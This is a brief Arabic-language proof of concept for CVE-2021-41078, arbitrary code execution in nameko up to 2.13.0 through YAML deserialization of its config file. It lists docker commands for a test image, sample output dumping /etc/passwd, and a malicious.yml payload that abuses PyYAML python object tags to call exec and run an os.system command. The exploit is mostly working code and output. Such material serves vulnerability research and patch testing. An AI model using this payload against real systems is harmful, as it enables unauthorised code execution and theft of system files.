
nameko تنفيذ تعليمات برمجية عشوائية بسبب إلغاء تسلسل YAML
تنفيذ كود تعسفي في nameko بسبب إلغاء تسلسل YAML
يمكن خداع Nameko حتى الإصدار 2.13.0 لتنفيذ كود تعسفي عند إلغاء تسلسل ملف الإعدادات.

docker build -t cve-2021-41078 .
docker run -it --rm cve-2021-41078
الإخراج /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
-- snip --

malicious.yml
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"